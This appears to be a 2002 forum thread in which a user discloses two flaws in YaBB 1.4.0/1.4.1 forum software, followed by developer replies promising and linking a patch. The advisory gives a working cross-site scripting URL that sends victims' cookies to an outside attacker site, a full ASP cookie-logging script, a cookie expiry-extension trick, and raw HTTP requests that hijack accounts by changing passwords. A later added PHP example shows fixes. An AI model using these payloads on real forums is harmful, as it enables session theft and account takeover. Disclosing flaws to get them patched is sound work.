
YaBB SE Community  |  Language Specific User Help  |  Español  |  VULNERABILITIES IN THE YABB 1.4.0 AND 1.4.1 FORUMS!!!
Author Topic: VULNERABILITIES IN THE YABB 1.4.0 AND 1.4.1 FORUMS!!!  (Read 817 times)
el-brujo
Jr. Member
**
Posts: 76


VULNERABILITIES IN THE YABB 1.4.0 AND 1.4.1 FORUMS!!!
« on: October 19, 2002, 06:29:13 PM »

__________________________________________
Two security vulnerabilities in YaBB allow stealing
users' cookies and hijacking users' accounts.

Tested on:
YaBB 1.40 & 1.41

Summary :
YaBB is a leading provider of free, downloadable PHP
forums for webmasters. Two security vulnerabilities in
the product allow a remote attacker to steal users' cookies, hijack users' accounts, and more. The issues
discussed are:
1. Cross Site Scripting Vulnerability on the login
procedure.
2. Unsecured changing profile method.

*************** 1. Cross Site Scripting Vulnerability
on the login procedure ******************

If we log into a YaBB forum and enter an invalid
username/password, the forum displays the username and the password we entered, and it doesn't strip HTML tags from the password
field, allowing us to write malicious HTML and
JavaScript into the page.

From now on, stealing the username cookie is pretty
easy. The method for this is creating a CSS (cross-site scripting)
vulnerability in the target site, forcing it to send the cookie to an .asp file we have created. This can be done with this statement:
http://target.com/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>window.location.href(%22http://www.oursite.com/hack.asp?%22%2Bdocument.cookie)</script>

Sending the above URL to someone may look suspicious to
him, but we can build a site which has an invisible
frame pointing to that URL, which is a lot more dangerous.

NOTE: YaBB doesn't allow us to use "=" or "%3d",
so we have to catch the cookie without a
Request("data") statement in the ASP file, because then we would need to put "data="
in the URL.

Ok, now let's build the hack.asp file, to log the
cookie we are posting. The file should look like this:
------------------------------- hack.asp ------------------------------------
<%
Option Explicit

Const ForWriting = 2
Const ForAppending = 8
Const Create = True

Dim MyFile
Dim FSO ' FileSystemObject
Dim TSO ' TextStreamObject
Dim Str
Str = Request.ServerVariables("QUERY_STRING")

MyFile = Server.MapPath("./db/log.txt")

Set FSO = Server.CreateObject("Scripting.FileSystemObject")
Set TSO = FSO.OpenTextFile(MyFile, ForAppending, Create)

If (Str <> "") Then TSO.WriteLine Str

TSO.Close
Set TSO = Nothing
Set FSO = Nothing
%>
<HTML>
<BODY>
You have just been hacked.
</BODY>
</HTML>
----------------------------------- EOF -----------------------------------

This file writes
Request.ServerVariables("QUERY_STRING"), which is the
whole query string we are posting after the "?", into a log file.


************* 2. Unsecured changing profile method
***************

YaBB has a form to change user details. The original
password is not required when changing the password to
a new one, meaning that if an attacker has someone else's cookie,
he can change that user's password.

- Defines:
USERNAME - The username
USERNAME COOKIE- The username cookie.

- YaBB Cookie Explanation :
The cookie's format of YaBB is something like :
Cookie: YaBBusername=<USERNAME>;
YaBBpassword=ys6bPWmp44PXA;
expiretime=1034304354
After the attacker has got the cookie, he can use the
cookie to change the user's password. He can use the
cookie even if the expiretime has passed, by changing the cookie to the
following:
Cookie: YaBBusername=<USERNAME>;
YaBBpassword=ys6bPWmp44PXA;
expiretime=9999999999

This one will always work.

- Exploiting the server and changing to a new password:
First of all, if the attacker only wants to change the
password and not the user details, he will have to get
them from the server database, and only then can he build the POST
request that will change the user's password. To do
that, he also has to include the stolen cookie.

To find out the user details, he will send this
request to the server:

------------------------------------
GET /forums/index.php?board=;action=profile;user=<USERNAME> HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
Accept-Language: en-us
Cookie: <USERNAME COOKIE>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.victim.com
Proxy-Connection: Keep-Alive
------------------------------------

Then the server will return a form with the <USERNAME>
details, and allow the attacker to change them. Note that
the form doesn't ask the user to enter his previous password, and it doesn't check anything but the username and his cookie to see if it is the legitimate user. Now the attacker is ready to build his main POST request to change the user's password.

The POST request might look like this :

------------------------------------
POST /forums/index.php?board=;action=profile2 HTTP/1.1
Accept: application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; TUCOWS; YComp 5.0.0.0)
Host: www.victim.com
Content-Length: 286
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: <USERNAME COOKIE>

userID=666&user=<USERNAME>&passwrd1=HaCkEd&passwrd2=HaCkEd&name=<USERNAME>&e[email protected]&gender=&bday1=00&bday2=00&bday3=0000&location=&websitetitle=&websiteurl=&icq=3&aim=&msn=&yim=&usertext=&hideemail=on&usertimeformat=&usertimeoffset=0&signature=&secretQuestion=&secretAnswer=&moda=1
------------------------------------

All the details that the attacker sets are values taken
from the form he got when he sent the GET request
first (note that userID is a hidden value).
You can see the "passwrd1" and "passwrd2" parameters
that the attacker sends to the server.
After sending the above POST request, the user's
password will be changed to "HaCkEd".

*************************************************************************

- Possible Solution:
For the CSS problem: Don't show the invalid
username/password, or at least strip HTML tags from
the password field.

For the password changing problem:
1. YaBB can save the IP of each user, and check the IP
when someone asks to change his password. (Still not
unbreakable, but much harder to exploit).
2. YaBB can ask the user to also enter the previous
password before changing it to a new one. In that way
the attacker won't be able to break the forum's protection by having only the user's cookie.
__________________________________________


Let's see if you can put out a patch or something.

Thanks in advance.
Logged
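The two server-side fixes from the advisory's "Possible Solution" section, as an added example that is not part of the original post or of YaBB's own code. It is plain PHP: it assumes YaBB's crypt()-style password hashes (the 13-character `YaBBpassword` value in the advisory), and the function names, the extra `currentpasswrd` form field and the server-side expiry record are illustrative assumptions, not YaBB SE identifiers.

```php
<?php
// Added example, not YaBB's code: the two server-side fixes the advisory's
// "Possible Solution" section asks for. Function names, the extra
// "currentpasswrd" form field and the server-side expiry record are
// assumptions for illustration; YaBB SE's real helpers and tables differ.
declare(strict_types=1);

// ---- 1. Cross-site scripting on the login page ----

// The pattern the advisory describes: what the user typed is pasted straight
// into the HTML of the "login failed" page, so a password containing
// "<script>...</script>" becomes live markup in the victim's browser.
function failedLoginVulnerable(string $user, string $pass): string
{
    return "<p>Invalid login for $user / $pass</p>";
}

// Hardened: never echo the password, and HTML-encode the username so that
// < > & " ' are rendered as text instead of being parsed as tags.
function failedLoginSafe(string $user): string
{
    $safeUser = htmlspecialchars($user, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<p>Invalid login for $safeUser.</p>";
}

// ---- 2. Password change with only a cookie ----

/**
 * Gate for action=profile2 when passwrd1/passwrd2 are set.
 *
 * $cookieHash      value of the YaBBpassword cookie (a crypt() hash in YaBB)
 * $storedHash      hash the server holds for the account named in YaBBusername
 * $currentPassword the old password, which the form now has to ask for
 * $serverExpiry    expiry the server itself recorded at login; the "expiretime"
 *                  value inside the cookie is attacker-controlled (the advisory
 *                  shows it rewritten to 9999999999) and is ignored here
 */
function mayChangePassword(
    string $cookieHash,
    string $storedHash,
    string $currentPassword,
    int $serverExpiry,
    int $now
): bool {
    if ($now > $serverExpiry) {
        return false;                       // session expired server-side
    }
    if (!hash_equals($storedHash, $cookieHash)) {
        return false;                       // cookie does not belong to this account
    }
    // The actual fix: possession of the cookie is not enough; the old password
    // must re-verify. crypt() with the stored hash as salt recomputes a
    // DES-style hash of the same shape as "ys6bPWmp44PXA" in the advisory.
    return hash_equals($storedHash, crypt($currentPassword, $storedHash));
}

// Demonstration with constructed values (no real accounts involved).
$storedHash   = crypt('correct horse', 'ab');   // what the server stores
$stolenCookie = $storedHash;                    // what an attacker copied
$now          = 1034304354;                     // timestamp from the advisory

echo failedLoginVulnerable('bob', '<script>alert(1)</script>'), "\n"; // tag survives
echo failedLoginSafe('<b>bob</b>'), "\n";                             // tag is encoded

// Cookie only, old password unknown: must be refused.
var_dump(mayChangePassword($stolenCookie, $storedHash, 'guess', $now + 3600, $now));
// Cookie plus the correct old password inside the server-side window: allowed.
var_dump(mayChangePassword($stolenCookie, $storedHash, 'correct horse', $now + 3600, $now));
// Server-side expiry passed, whatever the cookie's own expiretime claims: refused.
var_dump(mayChangePassword($stolenCookie, $storedHash, 'correct horse', $now - 1, $now));
```

Run it with `php example.php`. The point of checking `$serverExpiry` rather than the cookie's `expiretime` is that the advisory shows the client-side value being rewritten; anything the server wants to enforce about session lifetime has to live in its own records. The advisory's first suggestion (binding the session to the login IP) is deliberately not shown, since the text itself notes it is only a partial measure.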
Jordi
Noobie
*
Posts: 11


Don't touch the cat without gloves

Re:VULNERABILITIES IN THE YABB 1.4.0 AND 1.4.1 FORUMS!!!
« Reply #1 on: October 19, 2002, 11:21:46 PM »

Well, I don't know whether it has anything to do with this, but just today I found my user rank, "Administrador", changed to "okay". It had been changed from my profile.  ???

This same topic is posted on the main forum in English, and there is also a fix available for part of the problem.
« Last Edit: October 19, 2002, 11:59:36 PM by Jordi » Logged

Jordi Casanovas
From Barcelona, Spain
Omar Bazavilvazo
YaBB SE Developer
YaBB God
*****
Posts: 2153


I never said I would stay to the end...

Re:VULNERABILITIES IN THE YABB 1.4.0 AND 1.4.1 FORUMS!!!
« Reply #2 on: October 20, 2002, 04:37:52 PM »

The YSE devs have already seen that problem.

It's rather odd for someone to be able to steal your account, since they need your cookie, and to get your cookie they need access to your machine.

Anyway, a YSE 1.4.2 is coming out that fixes those security problems. It shouldn't be long (1 week, I think) before the patch comes out :)

ja ne!
Logged

Greetings from México!
http://omarbazavilvazo.com
My Spanish-Japanese forum
http://hablajapones.org
http://hablajapones.org/index.php/japones/tutoriales/b16.php

Do NOT send me IMs for support or questions
...I read the forums like everyone else...
Jordi
Noobie
*
Posts: 11


Don't touch the cat without gloves

Re:VULNERABILITIES IN THE YABB 1.4.0 AND 1.4.1 FORUMS!!!
« Reply #3 on: October 22, 2002, 03:40:30 PM »

Let's wait for that patch. But I am absolutely certain: nobody has access to my computer except me, nobody but me knows the password, and someone got into my account and changed my profile from "Administrador" to "okay". Maybe it was a test, I don't know, but there is no doubt that the account was hacked.
Logged

Jordi Casanovas
From Barcelona, Spain
Omar Bazavilvazo
YaBB SE Developer
YaBB God
*****
Posts: 2153


I never said I would stay to the end...

Re:VULNERABILITIES IN THE YABB 1.4.0 AND 1.4.1 FORUMS!!!
« Reply #4 on: October 22, 2002, 03:53:37 PM »

hmm...
well, that patch is about to come out anyway :P

your getting hacked is strange, but oh well, anything is possible... it was your turn :(

ja ne!
Logged

Greetings from México!
http://omarbazavilvazo.com
My Spanish-Japanese forum
http://hablajapones.org
http://hablajapones.org/index.php/japones/tutoriales/b16.php

Do NOT send me IMs for support or questions
...I read the forums like everyone else...
Omar Bazavilvazo
YaBB SE Developer
YaBB God
*****
Posts: 2153


I never said I would stay to the end...

Here it is:
« Reply #5 on: November 08, 2002, 05:49:49 PM »

http://www.yabb.info/community/index.php?board=172;action=display;threadid=14569

ja ne!
Logged

Greetings from México!
http://omarbazavilvazo.com
My Spanish-Japanese forum
http://hablajapones.org
http://hablajapones.org/index.php/japones/tutoriales/b16.php

Do NOT send me IMs for support or questions
...I read the forums like everyone else...